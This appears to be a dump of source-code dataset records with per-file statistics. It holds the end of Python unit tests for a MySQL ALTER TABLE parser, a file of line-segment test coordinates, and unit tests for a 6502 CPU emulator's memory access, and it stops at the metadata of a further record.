ALTER TABLE test_test ADD col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD COLUMN col1 LONGTEXT NOT NULL,
ADD COLUMN col2 VARCHAR(200) NULL,
ADD col3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
class AlterTableAddIndexSyntaxTest(unittest.TestCase):
def test_alter_table_add_index(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test ADD col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD INDEX index1 (col0, col1 (10), col2 (20) DESC);
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].alter_action, 'ADD INDEX')
self.assertEqual(statement.alter_specification[1].index_name, 'index1')
self.assertFalse(statement.alter_specification[1].index_type)
self.assertEqual(statement.alter_specification[1].index_columns[0].column_name, 'col0')
self.assertFalse(statement.alter_specification[1].index_columns[0].length)
self.assertFalse(statement.alter_specification[1].index_columns[0].direction)
self.assertEqual(statement.alter_specification[1].index_columns[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].index_columns[1].length[0], '10')
self.assertFalse(statement.alter_specification[1].index_columns[1].direction)
self.assertEqual(statement.alter_specification[1].index_columns[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[1].index_columns[2].length[0], '20')
self.assertEqual(statement.alter_specification[1].index_columns[2].direction, 'DESC')
def test_alter_table_add_index_index_type(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test ADD col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD INDEX index1 USING BTREE (col0, col1 (10), col2 (20) DESC);
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].alter_action, 'ADD INDEX')
self.assertEqual(statement.alter_specification[1].index_name, 'index1')
self.assertFalse(statement.alter_specification[1].index_type)
self.assertEqual(statement.alter_specification[1].index_columns[0].column_name, 'col0')
self.assertFalse(statement.alter_specification[1].index_columns[0].length)
self.assertFalse(statement.alter_specification[1].index_columns[0].direction)
self.assertEqual(statement.alter_specification[1].index_columns[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].index_columns[1].length[0], '10')
self.assertFalse(statement.alter_specification[1].index_columns[1].direction)
self.assertEqual(statement.alter_specification[1].index_columns[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[1].index_columns[2].length[0], '20')
self.assertEqual(statement.alter_specification[1].index_columns[2].direction, 'DESC')
def test_alter_table_add_index_index_option(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test ADD col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD INDEX index1 (col0, col1 (10), col2 (20) DESC)
KEY_BLOCK_SIZE=256
USING HASH
WITH PARSER some_parser
COMMENT 'test comment';
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].alter_action, 'ADD INDEX')
self.assertEqual(statement.alter_specification[1].index_name, 'index1')
self.assertEqual(statement.alter_specification[1].index_type[0], 'HASH')
self.assertEqual(statement.alter_specification[1].index_columns[0].column_name, 'col0')
self.assertFalse(statement.alter_specification[1].index_columns[0].length)
self.assertFalse(statement.alter_specification[1].index_columns[0].direction)
self.assertEqual(statement.alter_specification[1].index_columns[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].index_columns[1].length[0], '10')
self.assertFalse(statement.alter_specification[1].index_columns[1].direction)
self.assertEqual(statement.alter_specification[1].index_columns[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[1].index_columns[2].length[0], '20')
self.assertEqual(statement.alter_specification[1].index_columns[2].direction, 'DESC')
self.assertEqual(statement.alter_specification[1].key_block_size[0], '256')
self.assertEqual(statement.alter_specification[1].parser_name[0], 'some_parser')
self.assertEqual(statement.alter_specification[1].comment[0], 'test comment')
class AlterTableModifyColumnSyntaxTest(unittest.TestCase):
def test_alter_table_modify(self):
statement = alter_table_syntax.parseString("""
ALTER IGNORE TABLE test_test MODIFY col_no0 BIT(8) NOT NULL DEFAULT 0 FIRST,
MODIFY col_no1 LONGTEXT NOT NULL,
MODIFY col_no2 VARCHAR(200) NULL,
MODIFY col_no3 BIT(8) AFTER col0;
""")
self.assertTrue(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_modify_column(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test MODIFY COLUMN col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
MODIFY COLUMN col1 LONGTEXT NOT NULL,
MODIFY COLUMN col2 VARCHAR(200) NULL,
MODIFY COLUMN col3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_modify_column_mixed(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test MODIFY col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
MODIFY COLUMN col1 LONGTEXT NOT NULL,
MODIFY COLUMN col2 VARCHAR(200) NULL,
MODIFY col3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
class AlterTableChangeColumnSyntaxTest(unittest.TestCase):
def test_alter_table_change(self):
statement = alter_table_syntax.parseString("""
ALTER IGNORE TABLE test_test CHANGE col_no0 col_0 BIT(8) NOT NULL DEFAULT 0 FIRST,
CHANGE col_no1 col_1 LONGTEXT NOT NULL,
CHANGE col_no2 col_2 VARCHAR(200) NULL,
CHANGE col_no3 col_3 BIT(8) AFTER col0;
""")
self.assertTrue(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].new_column_name, 'col_0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].new_column_name, 'col_1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].new_column_name, 'col_2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].new_column_name, 'col_3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_change_column(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test CHANGE COLUMN col0 col_no0 BIT(8) NOT NULL DEFAULT 0 FIRST,
CHANGE COLUMN col1 col_no1 LONGTEXT NOT NULL,
CHANGE COLUMN col2 col_no2 VARCHAR(200) NULL,
CHANGE COLUMN col3 col_no3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].new_column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].new_column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].new_column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].new_column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_change_column_mixed(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test CHANGE col0 col_no0 BIT(8) NOT NULL DEFAULT 0 FIRST,
CHANGE COLUMN col1 col_no1 LONGTEXT NOT NULL,
CHANGE COLUMN col2 col_no2 VARCHAR(200) NULL,
CHANGE col3 col_no3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].new_column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].new_column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].new_column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].new_column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
class AlterTableDropSyntaxTest(unittest.TestCase):
def test_drop(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP col_no0;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP COLUMN')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
def test_drop_column(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP COLUMN col_no0;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP COLUMN')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
def test_drop_primary_key(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP PRIMARY KEY;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP PRIMARY KEY')
def test_drop_index(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP INDEX idx_no0;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP INDEX')
self.assertEqual(statement.alter_specification[0].index_name, 'idx_no0')
def test_drop_key(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP KEY idx_no0;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP INDEX')
self.assertEqual(statement.alter_specification[0].index_name, 'idx_no0')
def test_drop_foreign_key(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP FOREIGN KEY fk_no0;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP FOREIGN KEY')
self.assertEqual(statement.alter_specification[0].fk_symbol, 'fk_no0')
def test_drop_mixed(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test DROP col_no0,
DROP COLUMN col_no1,
DROP PRIMARY KEY,
DROP INDEX idx_no0,
DROP KEY idx_no1,
DROP FOREIGN KEY fk_no0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP COLUMN')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
self.assertEqual(statement.alter_specification[1].alter_action, 'DROP COLUMN')
self.assertEqual(statement.alter_specification[1].column_name, 'col_no1')
self.assertEqual(statement.alter_specification[2].alter_action, 'DROP PRIMARY KEY')
self.assertEqual(statement.alter_specification[3].alter_action, 'DROP INDEX')
self.assertEqual(statement.alter_specification[3].index_name, 'idx_no0')
self.assertEqual(statement.alter_specification[4].alter_action, 'DROP INDEX')
self.assertEqual(statement.alter_specification[4].index_name, 'idx_no1')
self.assertEqual(statement.alter_specification[5].alter_action, 'DROP FOREIGN KEY')
self.assertEqual(statement.alter_specification[5].fk_symbol, 'fk_no0')
class AlterTableDatabaseNameTest(unittest.TestCase):
def test_alter_table_database_name(self):
statement = alter_table_syntax.parseString("""
ALTER IGNORE TABLE test_db.test_test CHANGE col_no0 col_0 BIT(8) NOT NULL DEFAULT 0 FIRST,
CHANGE col_no1 col_1 LONGTEXT NOT NULL,
CHANGE col_no2 col_2 VARCHAR(200) NULL,
CHANGE col_no3 col_3 BIT(8) AFTER col0;
""")
self.assertTrue(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.database_name, 'test_db')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].new_column_name, 'col_0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].new_column_name, 'col_1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].new_column_name, 'col_2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].new_column_name, 'col_3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
class AlterTableRenameKeysIndexes(unittest.TestCase):
def test_rename_index(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test RENAME INDEX idx1 TO idx2;
""")
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test')
self.assertEqual(statement.alter_specification[0].old_index_name,
'idx1')
self.assertEqual(statement.alter_specification[0].new_index_name,
'idx2')
def test_rename_key(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test RENAME KEY key1 TO key2;
""")
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test')
self.assertEqual(statement.alter_specification[0].old_key_name, 'key1')
self.assertEqual(statement.alter_specification[0].new_key_name, 'key2')
def test_rename_mixed_index_key(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test
RENAME INDEX idx1 TO idx2,
RENAME KEY key1 TO key2;
""")
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test')
self.assertEqual(statement.alter_specification[0].old_index_name,
'idx1')
self.assertEqual(statement.alter_specification[0].new_index_name,
'idx2')
self.assertEqual(statement.alter_specification[1].old_key_name, 'key1')
self.assertEqual(statement.alter_specification[1].new_key_name, 'key2')
class AlterTableRename(unittest.TestCase):
def test_rename_table(self):
statements = [
"ALTER TABLE test1 RENAME test2;",
"ALTER TABLE test1 RENAME TO test2;",
"ALTER TABLE test1 RENAME AS test2;"
]
for statement in statements:
stmt = alter_table_syntax.parseString(statement)
self.assertEqual(stmt.statement_type, 'ALTER')
self.assertEqual(stmt.table_name, 'test1')
self.assertEqual(stmt.alter_specification[0].new_table_name,
'test2')
| 54.228145
| 98
| 0.713836
| 2,991
| 25,433
| 5.837178
| 0.038449
| 0.180423
| 0.284552
| 0.265766
| 0.940776
| 0.924394
| 0.900452
| 0.89335
| 0.892777
| 0.874105
| 0
| 0.024539
| 0.179609
| 25,433
| 468
| 99
| 54.344017
| 0.812221
| 0.000865
| 0
| 0.708229
| 0
| 0
| 0.197843
| 0
| 0
| 0
| 0
| 0
| 0.600998
| 1
| 0.05985
| false
| 0
| 0.007481
| 0
| 0.087282
| 0.002494
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d450f9d753c063632e390390d792dfdf3e502a4e
| 3,089
|
py
|
Python
|
tests/data/test_none_circle_zigzag.py
|
ideasman42/isect_segments-bentley_ottmann
|
19deb3c5be4c2b91689b87548a875054b43e9952
|
[
"MIT"
] | 80
|
2015-12-04T15:06:49.000Z
|
2022-03-02T18:08:15.000Z
|
test/data/test_none_circle_zigzag.py
|
lolistoy/sweepline
|
82a2464f984c119dd438489c5f826e9693a7fabf
|
[
"MIT"
] | 25
|
2015-10-18T13:58:28.000Z
|
2021-06-23T21:54:54.000Z
|
test/data/test_none_circle_zigzag.py
|
lolistoy/sweepline
|
82a2464f984c119dd438489c5f826e9693a7fabf
|
[
"MIT"
] | 37
|
2016-07-06T01:38:33.000Z
|
2022-02-19T03:53:14.000Z
|
data = (
((-0.195090, 0.980785), (0.000000, 1.000000)),
((-0.382683, 0.923880), (-0.195090, 0.980785)),
((-0.555570, 0.831470), (-0.382683, 0.923880)),
((-0.707107, 0.707107), (-0.555570, 0.831470)),
((-0.831470, 0.555570), (-0.707107, 0.707107)),
((-0.923880, 0.382683), (-0.831470, 0.555570)),
((-0.980785, 0.195090), (-0.923880, 0.382683)),
((-0.651678, 0.500014), (0.831491, 0.344416)),
((0.831491, 0.344416), (-0.817293, 0.175582)),
((-0.882707, 0.175581), (0.768508, 0.344415)),
((0.768508, 0.344415), (-0.748323, 0.500013)),
((-0.748323, 0.500013), (0.563604, 0.636396)),
((0.563604, 0.636396), (-0.500013, 0.748323)),
((-0.500013, 0.748323), (0.255585, 0.831492)),
((0.923879, 0.382684), (0.980785, 0.195091)),
((0.831469, 0.555571), (0.923879, 0.382684)),
((0.707106, 0.707108), (0.831469, 0.555571)),
((0.555569, 0.831470), (0.707106, 0.707108)),
((0.382682, 0.923880), (0.555569, 0.831470)),
((0.195089, 0.980786), (0.382682, 0.923880)),
((0.000000, 1.000000), (0.195089, 0.980786)),
((0.255585, 0.831492), (-0.175581, 0.882707)),
((-0.175581, 0.882707), (-0.000000, 0.900000)),
((-0.399988, 0.748323), (0.636395, 0.636397)),
((0.344414, 0.831492), (-0.399988, 0.748323)),
((-0.124420, 0.882707), (0.344414, 0.831492)),
((-0.195090, -0.980785), (0.000000, -1.000000)),
((-0.382683, -0.923880), (-0.195090, -0.980785)),
((-0.555570, -0.831470), (-0.382683, -0.923880)),
((-0.707107, -0.707107), (-0.555570, -0.831470)),
((-0.831470, -0.555570), (-0.707107, -0.707107)),
((-0.923880, -0.382683), (-0.831470, -0.555570)),
((-0.980785, -0.195090), (-0.923880, -0.382683)),
((-1.000000, -0.000000), (-0.980785, -0.195090)),
((-0.651678, -0.500014), (0.831491, -0.344416)),
((0.831491, -0.344416), (-0.817293, -0.175582)),
((-0.817293, -0.175582), (0.900000, -0.000001)),
((0.800000, -0.000000), (-0.882707, -0.175581)),
((-0.882707, -0.175581), (0.768508, -0.344415)),
((0.768508, -0.344415), (-0.748323, -0.500013)),
((-0.748323, -0.500013), (0.563604, -0.636396)),
((0.563604, -0.636396), (-0.500013, -0.748323)),
((-0.500013, -0.748323), (0.255585, -0.831492)),
((0.980785, -0.195091), (1.000000, -0.000001)),
((0.923879, -0.382684), (0.980785, -0.195091)),
((0.831469, -0.555571), (0.923879, -0.382684)),
((0.707106, -0.707108), (0.831469, -0.555571)),
((0.555569, -0.831470), (0.707106, -0.707108)),
((0.382682, -0.923880), (0.555569, -0.831470)),
((0.195089, -0.980786), (0.382682, -0.923880)),
((0.000000, -1.000000), (0.195089, -0.980786)),
((0.255585, -0.831492), (-0.175581, -0.882707)),
((-0.175581, -0.882707), (-0.000000, -0.900000)),
((-0.399988, -0.748323), (0.636395, -0.636397)),
((0.344414, -0.831492), (-0.399988, -0.748323)),
((-0.124420, -0.882707), (0.344414, -0.831492)),
((-1.000000, -0.000000), (-0.980785, 0.195090)),
((-0.000000, 0.900000), (-0.124420, 0.882707)),
((0.636395, 0.636397), (-0.651678, 0.500014)),
((-0.817293, 0.175582), (0.900000, -0.000001)),
((0.800000, -0.000000), (-0.882707, 0.175581)),
((0.980785, 0.195091), (1.000000, -0.000001)),
((-0.000000, -0.900000), (-0.124420, -0.882707)),
((0.636395, -0.636397), (-0.651678, -0.500014)),
)
| 46.104478
| 49
| 0.581418
| 513
| 3,089
| 3.500975
| 0.089669
| 0.062361
| 0.053452
| 0.046771
| 0.997773
| 0.997773
| 0.997773
| 0.997773
| 0.997773
| 0.936526
| 0
| 0.633439
| 0.08417
| 3,089
| 66
| 50
| 46.80303
| 0.001414
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2e5b253946ffd1eb0830823820b897380db7a0fd
| 5,153
|
py
|
Python
|
tests/test_cpu.py
|
hspaans/cs-6502-emulator-python
|
9057a22c92e5d9de568758e109a4cff70d1d5b74
|
[
"MIT"
] | null | null | null |
tests/test_cpu.py
|
hspaans/cs-6502-emulator-python
|
9057a22c92e5d9de568758e109a4cff70d1d5b74
|
[
"MIT"
] | null | null | null |
tests/test_cpu.py
|
hspaans/cs-6502-emulator-python
|
9057a22c92e5d9de568758e109a4cff70d1d5b74
|
[
"MIT"
] | null | null | null |
"""Verifies that the processor class works as expected."""
import m6502
def test_cpu_reset() -> None:
"""
Verify CPU state after CPU Reset.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
) == (0xFCE2, 0x01FD, 0, True, False, True)
def test_cpu_read_byte() -> None:
"""
Verify CPU can read a byte from memory.
The cost of the read operation is 1 cycle, and the state of the CPU is
not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
memory[0x0001] = 0xA5
value = cpu.read_byte(0x0001)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE2, 0x01FD, 1, True, False, True, 0xA5)
def test_cpu_read_word() -> None:
"""
Verify CPU can read a word from memory.
The cost of the read operation is 2 cycles, and the state of the CPU is
not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
memory[0x0001] = 0xA5
memory[0x0002] = 0x5A
value = cpu.read_word(0x0001)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE2, 0x01FD, 2, True, False, True, 0x5AA5)
def test_cpu_write_byte() -> None:
"""
Verify CPU can write a byte to memory.
The cost of the write operation is 1 cycle, and the state of the CPU is
not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
cpu.write_byte(0x0001, 0xA5)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
memory[0x0001],
) == (0xFCE2, 0x01FD, 1, True, False, True, 0xA5)
def test_cpu_write_word() -> None:
"""
Verify CPU can write a byte to memory.
The cost of the write operation is 1 cycle, and the state of the CPU is
not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
cpu.write_word(0x0001, 0x5AA5)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
memory[0x0001],
memory[0x0002],
) == (0xFCE2, 0x01FD, 2, True, False, True, 0xA5, 0x5A)
def test_cpu_read_write_byte() -> None:
"""
Verify CPU can read and write a byte from memory.
The cost of the read operation is 1 cycle, and the state of the CPU is
not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
cpu.write_byte(0x0001, 0xA5)
value = cpu.read_byte(0x0001)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE2, 0x01FD, 2, True, False, True, 0xA5)
def test_cpu_read_write_word() -> None:
"""
Verify CPU can read and write a byte from memory.
The cost of the read operation is 1 cycle, and the state of the CPU is
not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
cpu.write_word(0x0001, 0x5AA5)
value = cpu.read_word(0x0001)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE2, 0x01FD, 4, True, False, True, 0x5AA5)
def test_cpu_fetch_byte() -> None:
"""
Verify CPU can fetch a byte from memory.
The cost of the fetch operation is 1 cycle, and increases the program
counter by 1. The state of the CPU is not changed further.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
memory[0xFCE2] = 0xA5
value = cpu.fetch_byte()
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE3, 0x01FD, 1, True, False, True, 0xA5)
def test_cpu_fetch_word() -> None:
"""
Verify CPU can fetch a word from memory.
The cost of the fetch operation is 2 cycle, and increases the program
counter by 2. The state of the CPU is not changed further.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
memory[0xFCE2] = 0xA5
memory[0xFCE3] = 0x5A
value = cpu.fetch_word()
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE4, 0x01FD, 2, True, False, True, 0x5AA5)
| 23.107623
| 75
| 0.589948
| 699
| 5,153
| 4.230329
| 0.094421
| 0.063916
| 0.030436
| 0.063916
| 0.913426
| 0.905648
| 0.854244
| 0.804532
| 0.792019
| 0.742306
| 0
| 0.072367
| 0.305453
| 5,153
| 222
| 76
| 23.211712
| 0.753842
| 0.258878
| 0
| 0.835821
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082728
| 0
| 0.067164
| 1
| 0.067164
| false
| 0
| 0.007463
| 0
| 0.074627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cf610382b223d0e7e702021a934b8f0239f057e6
| 184
|
py
|
Python
|
query_lang/run_antlr.py
|
nikitavlaev/formal-languages
|
4e5212858e7cdaa6f2d5130189f88b66e317d25f
|
[
"Unlicense"
] | null | null | null |
query_lang/run_antlr.py
|
nikitavlaev/formal-languages
|
